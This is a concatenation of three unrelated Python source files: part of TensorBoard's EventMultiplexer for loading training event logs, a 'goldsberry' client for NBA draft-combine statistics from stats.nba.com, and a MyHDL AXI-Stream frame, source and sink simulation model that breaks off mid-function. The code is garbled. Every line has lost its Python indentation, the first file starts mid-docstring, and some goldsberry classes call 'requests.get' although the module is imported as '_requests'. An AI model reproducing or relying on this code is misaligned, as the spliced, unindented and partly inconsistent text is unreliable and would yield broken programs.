TensorFlow execution. The `EventMultiplexer` provides methods for extracting
information about events from multiple `run`s.
Example usage for loading specific runs from files:
```python
x = EventMultiplexer({'run1': 'path/to/run1', 'run2': 'path/to/run2'})
x.Reload()
```
Example usage for loading a directory where each subdirectory is a run
```python
(eg:) /parent/directory/path/
/parent/directory/path/run1/
/parent/directory/path/run1/events.out.tfevents.1001
/parent/directory/path/run1/events.out.tfevents.1002
/parent/directory/path/run2/
/parent/directory/path/run2/events.out.tfevents.9232
/parent/directory/path/run3/
/parent/directory/path/run3/events.out.tfevents.9232
x = EventMultiplexer().AddRunsFromDirectory('/parent/directory/path')
(which is equivalent to:)
x = EventMultiplexer({'run1': '/parent/directory/path/run1', 'run2':...}
```
If you would like to watch `/parent/directory/path`, wait for it to be created
(if necessary) and then periodically pick up new runs, use
`AutoloadingMultiplexer`
@@__init__
@@AddRun
@@AddRunsFromDirectory
@@Reload
@@Runs
@@RunPaths
@@Scalars
@@Graph
@@MetaGraph
@@Histograms
@@CompressedHistograms
@@Images
@@Audio
"""
def __init__(self,
run_path_map=None,
size_guidance=event_accumulator.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True):
"""Constructor for the `EventMultiplexer`.
Args:
run_path_map: Dict `{run: path}` which specifies the
name of a run, and the path to find the associated events. If it is
None, then the EventMultiplexer initializes without any runs.
size_guidance: A dictionary mapping from `tagType` to the number of items
to store for each tag of that type. See
`event_accumulator.EventAccumulator` for details.
purge_orphaned_data: Whether to discard any events that were "orphaned" by
a TensorFlow restart.
"""
self._accumulators_mutex = threading.Lock()
self._accumulators = {}
self._paths = {}
self._reload_called = False
self._size_guidance = size_guidance
self.purge_orphaned_data = purge_orphaned_data
if run_path_map is not None:
for (run, path) in six.iteritems(run_path_map):
self.AddRun(path, run)
def AddRun(self, path, name=None):
"""Add a run to the multiplexer.
If the name is not specified, it is the same as the path.
If a run by that name exists, and we are already watching the right path,
do nothing. If we are watching a different path, replace the event
accumulator.
If `Reload` has been called, it will `Reload` the newly created
accumulators.
Args:
path: Path to the event files (or event directory) for given run.
name: Name of the run to add. If not provided, is set to path.
Returns:
The `EventMultiplexer`.
"""
if name is None or name is '':
name = path
accumulator = None
with self._accumulators_mutex:
if name not in self._accumulators or self._paths[name] != path:
if name in self._paths and self._paths[name] != path:
# TODO(danmane) - Make it impossible to overwrite an old path with
# a new path (just give the new path a distinct name)
logging.warning('Conflict for name %s: old path %s, new path %s',
name, self._paths[name], path)
logging.info('Constructing EventAccumulator for %s', path)
accumulator = event_accumulator.EventAccumulator(
path,
size_guidance=self._size_guidance,
purge_orphaned_data=self.purge_orphaned_data)
self._accumulators[name] = accumulator
self._paths[name] = path
if accumulator:
if self._reload_called:
accumulator.Reload()
return self
def AddRunsFromDirectory(self, path, name=None):
"""Load runs from a directory; recursively walks subdirectories.
If path doesn't exist, no-op. This ensures that it is safe to call
`AddRunsFromDirectory` multiple times, even before the directory is made.
If path is a directory, load event files in the directory (if any exist) and
recursively call AddRunsFromDirectory on any subdirectories. This mean you
can call AddRunsFromDirectory at the root of a tree of event logs and
TensorBoard will load them all.
If the `EventMultiplexer` is already loaded this will cause
the newly created accumulators to `Reload()`.
Args:
path: A string path to a directory to load runs from.
name: Optionally, what name to apply to the runs. If name is provided
and the directory contains run subdirectories, the name of each subrun
is the concatenation of the parent name and the subdirectory name. If
name is provided and the directory contains event files, then a run
is added called "name" and with the events from the path.
Raises:
ValueError: If the path exists and isn't a directory.
Returns:
The `EventMultiplexer`.
"""
for subdir in GetLogdirSubdirectories(path):
logging.info('Adding events from directory %s', subdir)
rpath = os.path.relpath(subdir, path)
subname = os.path.join(name, rpath) if name else rpath
self.AddRun(subdir, name=subname)
return self
def Reload(self):
"""Call `Reload` on every `EventAccumulator`."""
self._reload_called = True
# Build a list so we're safe even if the list of accumulators is modified
# even while we're reloading.
with self._accumulators_mutex:
items = list(self._accumulators.items())
names_to_delete = set()
for name, accumulator in items:
try:
accumulator.Reload()
except (OSError, IOError) as e:
logging.error("Unable to reload accumulator '%s': %s", name, e)
except directory_watcher.DirectoryDeletedError:
names_to_delete.add(name)
with self._accumulators_mutex:
for name in names_to_delete:
logging.warning("Deleting accumulator '%s'", name)
del self._accumulators[name]
return self
def FirstEventTimestamp(self, run):
"""Return the timestamp of the first event of the given run.
This may perform I/O if no events have been loaded yet for the run.
Args:
run: A string name of the run for which the timestamp is retrieved.
Returns:
The wall_time of the first event of the run, which will typically be
seconds since the epoch.
Raises:
KeyError: If the run is not found.
ValueError: If the run has no events loaded and there are no events on
disk to load.
"""
accumulator = self._GetAccumulator(run)
return accumulator.FirstEventTimestamp()
def Scalars(self, run, tag):
"""Retrieve the scalar events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.ScalarEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Scalars(tag)
def Graph(self, run):
"""Retrieve the graph associated with the provided run.
Args:
run: A string name of a run to load the graph for.
Raises:
KeyError: If the run is not found.
ValueError: If the run does not have an associated graph.
Returns:
The `GraphDef` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Graph()
def MetaGraph(self, run):
"""Retrieve the metagraph associated with the provided run.
Args:
run: A string name of a run to load the graph for.
Raises:
KeyError: If the run is not found.
ValueError: If the run does not have an associated graph.
Returns:
The `MetaGraphDef` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.MetaGraph()
def RunMetadata(self, run, tag):
"""Get the session.run() metadata associated with a TensorFlow run and tag.
Args:
run: A string name of a TensorFlow run.
tag: A string name of the tag associated with a particular session.run().
Raises:
KeyError: If the run is not found, or the tag is not available for the
given run.
Returns:
The metadata in the form of `RunMetadata` protobuf data structure.
"""
accumulator = self._GetAccumulator(run)
return accumulator.RunMetadata(tag)
def Histograms(self, run, tag):
"""Retrieve the histogram events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.HistogramEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Histograms(tag)
def CompressedHistograms(self, run, tag):
"""Retrieve the compressed histogram events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.CompressedHistogramEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.CompressedHistograms(tag)
def Images(self, run, tag):
"""Retrieve the image events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.ImageEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Images(tag)
def Audio(self, run, tag):
"""Retrieve the audio events associated with a run and tag.
Args:
run: A string name of the run for which values are retrieved.
tag: A string name of the tag for which values are retrieved.
Raises:
KeyError: If the run is not found, or the tag is not available for
the given run.
Returns:
An array of `event_accumulator.AudioEvents`.
"""
accumulator = self._GetAccumulator(run)
return accumulator.Audio(tag)
def Runs(self):
"""Return all the run names in the `EventMultiplexer`.
Returns:
```
{runName: { images: [tag1, tag2, tag3],
scalarValues: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
compressedHistograms: [tagX, tagY, tagZ],
graph: true, meta_graph: true}}
```
"""
with self._accumulators_mutex:
# To avoid nested locks, we construct a copy of the run-accumulator map
items = list(six.iteritems(self._accumulators))
return {run_name: accumulator.Tags() for run_name, accumulator in items}
def RunPaths(self):
"""Returns a dict mapping run names to event file paths."""
return self._paths
def _GetAccumulator(self, run):
with self._accumulators_mutex:
return self._accumulators[run]
def GetLogdirSubdirectories(path):
"""Returns subdirectories with event files on path."""
if io_wrapper.Exists(path) and not io_wrapper.IsDirectory(path):
raise ValueError('GetLogdirSubdirectories: path exists and is not a '
'directory, %s' % path)
# ListRecursively just yields nothing if the path doesn't exist.
return (
subdir
for (subdir, files) in io_wrapper.ListRecursively(path)
if list(filter(event_accumulator.IsTensorFlowEventsFile, files))
)
|
|
import requests as _requests
from goldsberry._apiFunc import *
class anthro:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombineplayeranthro?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season),
}
self._pull = _requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID -
TEMP_PLAYER_ID -
PLAYER_NAME -
FIRST_NAME -
LAST_NAME -
POSITION - Projected Position of the Prospect
BODY_FAT_PCT - Body Fat Percentage
HAND_LENGTH - Length of the Prospect's hand
in inches. The measurement is taken from the bottom of the
player's palm to the tip of his middle finger.
HAND_WIDTH - Width of the Prospects hand in
inches. The measurement is taken from the player's outstretched
hand from the tip of the thumb to tip of the pinky finger.
HEIGHT_WO_SHOES_FT_IN - Height of the player
without wearing shoes.
HEIGHT_WO_SHOES -
HEIGHT_W_SHOES_FT_IN - Height of the player
while in shoes.
HEIGHT_W_SHOES -
STANDING_REACH_FT_IN - The reach in inches
of the player while standing still. The player reaches straight
up to his highest point.
STANDING_REACH -
WEIGHT - The weight of the player in pounds.
WINGSPAN_FT_IN - The player stretches his arms
horizontally and a measure is made from the tip of his left hand
to the tip of his right hand.
WINGSPAN -
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class agility:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinedrillresults?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
self._pull = requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
LANE_AGILITY_TIME -- Lane Agility (seconds) - This drill measures
lateral quickness and the player's agility.
MODIFIED_LANE_AGILITY_TIME -- Shuttle Run (seconds) - This measures a
player's agility and ability to change directions.
THREE_QUARTER_SPRINT -- Three Quarter Sprint (seconds) - A player is
timed in a sprint from the baseline to 3/4th the length of the
court.
STANDING_VERTICAL_LEAP -- Standing (inches) - The vertical leap of a
player with no running start.
MAX_VERTICAL_LEAP -- Max Vertical Leap (inches) - The vertical leap
of a player with a few steps to start and gather his leap.
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class non_stationary_shooting:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinenonstationaryshooting?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
self._pull = requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
OFF_DRIB_COLLEGE_BREAK_LEFT_MADE --
OFF_DRIB_COLLEGE_BREAK_LEFT_ATTEMPT --
OFF_DRIB_COLLEGE_BREAK_LEFT_PCT -- Off Dribble College Break Left - A player takes six
shots coming off the dribble from the left break area of the court. The shot is from
about the distance of a college three pointer (20 ft. 9 in.).
OFF_DRIB_COLLEGE_BREAK_RIGHT_MADE --
OFF_DRIB_COLLEGE_BREAK_RIGHT_ATTEMPT --
OFF_DRIB_COLLEGE_BREAK_RIGHT_PCT -- Off Dribble College Break Right - A player takes six
shots coming off the dribble from the right break area of the court. The shot is from
about the distance of a college three pointer (20 ft. 9 in.).
OFF_DRIB_COLLEGE_TOP_KEY_MADE --
OFF_DRIB_COLLEGE_TOP_KEY_ATTEMPT --
OFF_DRIB_COLLEGE_TOP_KEY_PCT -- Off Dribble College Top Key - A player takes six shots
coming off the dribble from the top of the key. The shot is from about the distance
of a college three pointer (20 ft. 9 in.).
OFF_DRIB_FIFTEEN_BREAK_LEFT_MADE --
OFF_DRIB_FIFTEEN_BREAK_LEFT_ATTEMPT --
OFF_DRIB_FIFTEEN_BREAK_LEFT_PCT -- Off Dribble Fifteen Break Left - A player takes six
shots coming off the dribble from 15 feet away from the basket on the left break
area of the court.
OFF_DRIB_FIFTEEN_BREAK_RIGHT_MADE --
OFF_DRIB_FIFTEEN_BREAK_RIGHT_ATTEMPT --
OFF_DRIB_FIFTEEN_BREAK_RIGHT_PCT -- Off Dribble Fifteen Break Right - A player takes six
shots coming off the dribble from 15 feet away from the basket on the right break area
of the court.
OFF_DRIB_FIFTEEN_TOP_KEY_MADE --
OFF_DRIB_FIFTEEN_TOP_KEY_ATTEMPT --
OFF_DRIB_FIFTEEN_TOP_KEY_PCT -- Off Dribble Fifteen Top Key - A player takes six shots
coming off the dribble from 15 feet out at the top of the key.
ON_MOVE_COLLEGE_MADE --
ON_MOVE_COLLEGE_ATTEMPT --
ON_MOVE_COLLEGE_PCT -- On the Move College - 35 seconds to attempt as many shots as time
allows from college 3-pt range (20 ft. 9 in.) while moving between spots (corners
and elbows from both sides).
ON_MOVE_FIFTEEN_MADE --
ON_MOVE_FIFTEEN_ATTEMPT --
ON_MOVE_FIFTEEN_PCT -- On the Move Fifteen - 35 seconds to attempt as many shots as time
allows from 15 feet while moving between spots (corners and elbows from both sides).
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class spot_up_shooting:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinespotshooting?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
self._pull = requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
PLAYER_ID --
TEMP_PLAYER_ID --
PLAYER_NAME --
FIRST_NAME --
LAST_NAME --
POSITION -- Projected Position of the Prospect
NBA_BREAK_LEFT_MADE --
NBA_BREAK_LEFT_ATTEMPT --
NBA_BREAK_LEFT_PCT -- NBA Break Left - A player takes five shots
from the left break area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_BREAK_RIGHT_MADE --
NBA_BREAK_RIGHT_ATTEMPT --
NBA_BREAK_RIGHT_PCT -- NBA Break Right - A player takes five shots
from the right break area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_CORNER_LEFT_MADE --
NBA_CORNER_LEFT_ATTEMPT --
NBA_CORNER_LEFT_PCT -- NBA Corner Left - A player takes five shots
from the left corner area of the court. The shot is from the
distance of an NBA three pointer (23 ft. 9 in.)
NBA_CORNER_RIGHT_MADE --
NBA_CORNER_RIGHT_ATTEMPT --
NBA_CORNER_RIGHT_PCT -- NBA Corner Right - A player takes five
shots from the right corner area of the court. The shot is from
the distance of an NBA three pointer (23 ft. 9 in.)
NBA_TOP_KEY_MADE --
NBA_TOP_KEY_ATTEMPT --
NBA_TOP_KEY_PCT -- NBA Top Key - A player takes five shots from top
of the key. The shot is from the distance of an NBA three
pointer (23 ft. 9 in.)
COLLEGE_BREAK_LEFT_MADE --
COLLEGE_BREAK_LEFT_ATTEMPT --
COLLEGE_BREAK_LEFT_PCT -- College Break Left - A player takes five
shots from the left break area of the court. The shot is from
the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_BREAK_RIGHT_MADE --
COLLEGE_BREAK_RIGHT_ATTEMPT --
COLLEGE_BREAK_RIGHT_PCT -- College Break Right - A player takes
five shots from the right break area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_CORNER_LEFT_MADE --
COLLEGE_CORNER_LEFT_ATTEMPT --
COLLEGE_CORNER_LEFT_PCT -- College Corner Left - A player takes
five shots from the left corner area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_CORNER_RIGHT_MADE --
COLLEGE_CORNER_RIGHT_ATTEMPT --
COLLEGE_CORNER_RIGHT_PCT -- College Corner Right - A player takes
five shots from the right corner area of the court. The shot is
from the distance of a college three pointer (20 ft. 9 in.).
COLLEGE_TOP_KEY_MADE --
COLLEGE_TOP_KEY_ATTEMPT --
COLLEGE_TOP_KEY_PCT -- College Top Key - A player takes five shots
from the top of the key. The shot is from the distance of a
college three pointer (20 ft. 9 in.).
FIFTEEN_BREAK_LEFT_MADE --
FIFTEEN_BREAK_LEFT_ATTEMPT --
FIFTEEN_BREAK_LEFT_PCT -- Fifteen Break Left - A player takes five
shots from the left break and 15 feet away from the basket.
FIFTEEN_BREAK_RIGHT_MADE --
FIFTEEN_BREAK_RIGHT_ATTEMPT --
FIFTEEN_BREAK_RIGHT_PCT -- Fifteen Break Right - A player takes
five shots from the right break and 15 feet away from the
basket.
FIFTEEN_CORNER_LEFT_MADE --
FIFTEEN_CORNER_LEFT_ATTEMPT --
FIFTEEN_CORNER_LEFT_PCT -- Fifteen Corner Left - A player takes
five shots from the left baseline and 15 feet away from the
basket.
FIFTEEN_CORNER_RIGHT_MADE --
FIFTEEN_CORNER_RIGHT_ATTEMPT --
FIFTEEN_CORNER_RIGHT_PCT -- Fifteen Corner Right - A player takes
five shots from the right baseline and 15 feet away from the
basket.
FIFTEEN_TOP_KEY_MADE --
FIFTEEN_TOP_KEY_ATTEMPT --
FIFTEEN_TOP_KEY_PCT -- Fifteen Top Key - A player takes five shots
from the top of the key and 15 feet away from the basket.
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
class combine:
def __init__(self, season='2014', league='NBA'):
self._url = "http://stats.nba.com/stats/draftcombinestats?"
self._api_param = {'LeagueID':_nbaLeague(league),
'SeasonYear':_nbaSeason(season)
}
self._pull = requests.get(self._url, params=self._api_param)
def data(self):
"""Returns list of dicts with anthropometric data
For best results, wrap this in pandas.DataFrame()
Return values:
SEASON --
PLAYER_ID --
FIRST_NAME --
LAST_NAME --
PLAYER_NAME --
POSITION --
HEIGHT_WO_SHOES --
HEIGHT_WO_SHOES_FT_IN --
HEIGHT_W_SHOES --
HEIGHT_W_SHOES_FT_IN --
WEIGHT --
WINGSPAN --
WINGSPAN_FT_IN --
STANDING_REACH --
STANDING_REACH_FT_IN --
BODY_FAT_PCT --
HAND_LENGTH --
HAND_WIDTH --
STANDING_VERTICAL_LEAP --
MAX_VERTICAL_LEAP --
LANE_AGILITY_TIME --
MODIFIED_LANE_AGILITY_TIME --
THREE_QUARTER_SPRINT --
SPOT_FIFTEEN_CORNER_LEFT --
SPOT_FIFTEEN_BREAK_LEFT --
SPOT_FIFTEEN_TOP_KEY --
SPOT_FIFTEEN_BREAK_RIGHT --
SPOT_FIFTEEN_CORNER_RIGHT --
SPOT_COLLEGE_CORNER_LEFT --
SPOT_COLLEGE_BREAK_LEFT --
SPOT_COLLEGE_TOP_KEY --
SPOT_COLLEGE_BREAK_RIGHT --
SPOT_COLLEGE_CORNER_RIGHT --
SPOT_NBA_CORNER_LEFT --
SPOT_NBA_BREAK_LEFT --
SPOT_NBA_TOP_KEY --
SPOT_NBA_BREAK_RIGHT --
SPOT_NBA_CORNER_RIGHT --
OFF_DRIB_FIFTEEN_BREAK_LEFT --
OFF_DRIB_FIFTEEN_TOP_KEY --
OFF_DRIB_FIFTEEN_BREAK_RIGHT --
OFF_DRIB_COLLEGE_BREAK_LEFT --
OFF_DRIB_COLLEGE_TOP_KEY --
OFF_DRIB_COLLEGE_BREAK_RIGHT --
ON_MOVE_FIFTEEN --
ON_MOVE_COLLEGE --
"""
_headers = self._pull.json()['resultSets'][0]['headers']
_values = self._pull.json()['resultSets'][0]['rowSet']
return [dict(zip(_headers, value)) for value in _values]
__all__ = ['anthro', 'agility', 'non_stationary_shooting', 'spot_up_shooting', 'combine']
|
|
"""
Copyright (c) 2014-2018 Alex Forencich
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from myhdl import *
skip_asserts = False
class AXIStreamFrame(object):
def __init__(self, data=b'', keep=None, id=None, dest=None, user=None, last_cycle_user=None):
self.B = 0
self.N = 8
self.M = 1
self.WL = 8
self.data = b''
self.keep = None
self.id = 0
self.dest = 0
self.user = None
self.last_cycle_user = None
if type(data) in (bytes, bytearray):
self.data = bytearray(data)
self.keep = keep
self.id = id
self.dest = dest
self.user = user
self.last_cycle_user = last_cycle_user
elif type(data) is AXIStreamFrame:
self.N = data.N
self.WL = data.WL
if type(data.data) is bytearray:
self.data = bytearray(data.data)
else:
self.data = list(data.data)
if data.keep is not None:
self.keep = list(data.keep)
if data.id is not None:
if type(data.id) in (int, bool):
self.id = data.id
else:
self.id = list(data.id)
if data.dest is not None:
if type(data.dest) in (int, bool):
self.dest = data.dest
else:
self.dest = list(data.dest)
if data.user is not None:
if type(data.user) in (int, bool):
self.user = data.user
else:
self.user = list(data.user)
self.last_cycle_user = data.last_cycle_user
else:
self.data = list(data)
self.keep = keep
self.id = id
self.dest = dest
self.user = user
self.last_cycle_user = last_cycle_user
def build(self):
if self.data is None:
return
f = list(self.data)
tdata = []
tkeep = []
tid = []
tdest = []
tuser = []
i = 0
while len(f) > 0:
if self.B == 0:
data = 0
keep = 0
for j in range(self.M):
data = data | (f.pop(0) << (j*self.WL))
keep = keep | (1 << j)
if len(f) == 0: break
tdata.append(data)
if self.keep is None:
tkeep.append(keep)
else:
tkeep.append(self.keep[i])
else:
# multiple tdata signals
data = 0
tdata.append(f.pop(0))
tkeep.append(0)
if self.id is None:
tid.append(0)
elif type(self.id) is int:
tid.append(self.id)
else:
tid.append(self.id[i])
if self.dest is None:
tdest.append(0)
elif type(self.dest) is int:
tdest.append(self.dest)
else:
tdest.append(self.dest[i])
if self.user is None:
tuser.append(0)
elif type(self.user) is int:
tuser.append(self.user)
else:
tuser.append(self.user[i])
i += 1
if self.last_cycle_user:
tuser[-1] = self.last_cycle_user
return tdata, tkeep, tid, tdest, tuser
def parse(self, tdata, tkeep, tid, tdest, tuser):
if tdata is None or tkeep is None or tuser is None:
return
if len(tdata) != len(tkeep) or len(tdata) != len(tid) or len(tdata) != len(tdest) or len(tdata) != len(tuser):
raise Exception("Invalid data")
self.data = []
self.keep = []
self.id = []
self.dest = []
self.user = []
if self.B == 0:
mask = 2**self.WL-1
for i in range(len(tdata)):
for j in range(self.M):
if tkeep[i] & (1 << j):
self.data.append((tdata[i] >> (j*self.WL)) & mask)
self.keep.append(tkeep[i])
self.id.append(tid[i])
self.dest.append(tdest[i])
self.user.append(tuser[i])
else:
for i in range(len(tdata)):
self.data.append(tdata[i])
self.keep.append(tkeep[i])
self.id.append(tid[i])
self.dest.append(tdest[i])
self.user.append(tuser[i])
if self.WL == 8:
self.data = bytearray(self.data)
self.last_cycle_user = self.user[-1]
def __eq__(self, other):
if not isinstance(other, AXIStreamFrame):
return False
if self.data != other.data:
return False
if self.keep is not None and other.keep is not None:
if self.keep != other.keep:
return False
if self.id is not None and other.id is not None:
if type(self.id) in (int, bool) and type(other.id) is list:
for k in other.id:
if self.id != k:
return False
elif type(other.id) in (int, bool) and type(self.id) is list:
for k in self.id:
if other.id != k:
return False
elif self.id != other.id:
return False
if self.dest is not None and other.dest is not None:
if type(self.dest) in (int, bool) and type(other.dest) is list:
for k in other.dest:
if self.dest != k:
return False
elif type(other.dest) in (int, bool) and type(self.dest) is list:
for k in self.dest:
if other.dest != k:
return False
elif self.dest != other.dest:
return False
if self.last_cycle_user is not None and other.last_cycle_user is not None:
if self.last_cycle_user != other.last_cycle_user:
return False
if self.user is not None and other.user is not None:
if type(self.user) in (int, bool) and type(other.user) is list:
for k in other.user[:-1]:
if self.user != k:
return False
elif type(other.user) in (int, bool) and type(self.user) is list:
for k in self.user[:-1]:
if other.user != k:
return False
elif self.user != other.user:
return False
else:
if self.user is not None and other.user is not None:
if type(self.user) in (int, bool) and type(other.user) is list:
for k in other.user:
if self.user != k:
return False
elif type(other.user) in (int, bool) and type(self.user) is list:
for k in self.user:
if other.user != k:
return False
elif self.user != other.user:
return False
return True
def __repr__(self):
return (
('AXIStreamFrame(data=%s, ' % repr(self.data)) +
('keep=%s, ' % repr(self.keep)) +
('id=%s, ' % repr(self.id)) +
('dest=%s, ' % repr(self.dest)) +
('user=%s, ' % repr(self.user)) +
('last_cycle_user=%s)' % repr(self.last_cycle_user))
)
def __iter__(self):
return self.data.__iter__()
class AXIStreamSource(object):
def __init__(self):
self.has_logic = False
self.queue = []
def send(self, frame):
self.queue.append(AXIStreamFrame(frame))
def write(self, data):
self.send(data)
def count(self):
return len(self.queue)
def empty(self):
return not self.queue
def create_logic(self,
clk,
rst,
tdata=None,
tkeep=Signal(bool(True)),
tvalid=Signal(bool(False)),
tready=Signal(bool(True)),
tlast=Signal(bool(False)),
tid=Signal(intbv(0)),
tdest=Signal(intbv(0)),
tuser=Signal(intbv(0)),
pause=0,
name=None
):
assert not self.has_logic
self.has_logic = True
tready_int = Signal(bool(False))
tvalid_int = Signal(bool(False))
@always_comb
def pause_logic():
tready_int.next = tready and not pause
tvalid.next = tvalid_int and not pause
@instance
def logic():
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
B = 0
N = len(tdata)
M = len(tkeep)
WL = int((len(tdata)+M-1)/M)
if type(tdata) is list or type(tdata) is tuple:
# multiple tdata signals
B = len(tdata)
N = [len(b) for b in tdata]
M = 1
WL = [1]*B
while True:
yield clk.posedge, rst.posedge
if rst:
if B > 0:
for s in tdata:
s.next = 0
else:
tdata.next = 0
tkeep.next = 0
tid.next = 0
tdest.next = 0
tuser.next = False
tvalid_int.next = False
tlast.next = False
else:
if tready_int and tvalid:
if len(data) > 0:
if B > 0:
l = data.pop(0)
for i in range(B):
tdata[i].next = l[i]
else:
tdata.next = data.pop(0)
tkeep.next = keep.pop(0)
tid.next = id.pop(0)
tdest.next = dest.pop(0)
tuser.next = user.pop(0)
tvalid_int.next = True
tlast.next = len(data) == 0
else:
tvalid_int.next = False
tlast.next = False
if (tlast and tready_int and tvalid) or not tvalid_int:
if self.queue:
frame = self.queue.pop(0)
frame.B = B
frame.N = N
frame.M = M
frame.WL = WL
data, keep, id, dest, user = frame.build()
if name is not None:
print("[%s] Sending frame %s" % (name, repr(frame)))
if B > 0:
l = data.pop(0)
for i in range(B):
tdata[i].next = l[i]
else:
tdata.next = data.pop(0)
tkeep.next = keep.pop(0)
tid.next = id.pop(0)
tdest.next = dest.pop(0)
tuser.next = user.pop(0)
tvalid_int.next = True
tlast.next = len(data) == 0
return instances()
class AXIStreamSink(object):
def __init__(self):
self.has_logic = False
self.queue = []
self.read_queue = []
self.sync = Signal(intbv(0))
def recv(self):
if self.queue:
return self.queue.pop(0)
return None
def read(self, count=-1):
while self.queue:
self.read_queue.extend(self.queue.pop(0).data)
if count < 0:
count = len(self.read_queue)
data = self.read_queue[:count]
del self.read_queue[:count]
return data
def count(self):
return len(self.queue)
def empty(self):
return not self.queue
def wait(self, timeout=0):
if self.queue:
return
if timeout:
yield self.sync, delay(timeout)
else:
yield self.sync
def create_logic(self,
clk,
rst,
tdata=None,
tkeep=Signal(bool(True)),
tvalid=Signal(bool(False)),
tready=Signal(bool(True)),
tlast=Signal(bool(True)),
tid=Signal(intbv(0)),
tdest=Signal(intbv(0)),
tuser=Signal(intbv(0)),
pause=0,
name=None
):
assert not self.has_logic
self.has_logic = True
tready_int = Signal(bool(False))
tvalid_int = Signal(bool(False))
@always_comb
def pause_logic():
tready.next = tready_int and not pause
tvalid_int.next = tvalid and not pause
@instance
def logic():
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
B = 0
N = len(tdata)
M = len(tkeep)
WL = int((len(tdata)+M-1)/M)
first = True
if type(tdata) is list or type(tdata) is tuple:
# multiple tdata signals
B = len(tdata)
N = [len(b) for b in tdata]
M = 1
WL = [1]*B
while True:
yield clk.posedge, rst.posedge
if rst:
tready_int.next = False
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
first = True
else:
tready_int.next = True
if tvalid_int:
if not skip_asserts:
# zero tkeep not allowed
assert int(tkeep) != 0
# tkeep must be contiguous
# i.e. 0b00011110 allowed, but 0b00011010 not allowed
b = int(tkeep)
while b & 1 == 0:
b = b >> 1
while b & 1 == 1:
b = b >> 1
assert b == 0
# tkeep must not have gaps across cycles
if not first:
# not first cycle; lowest bit must be set
assert int(tkeep) & 1
if not tlast:
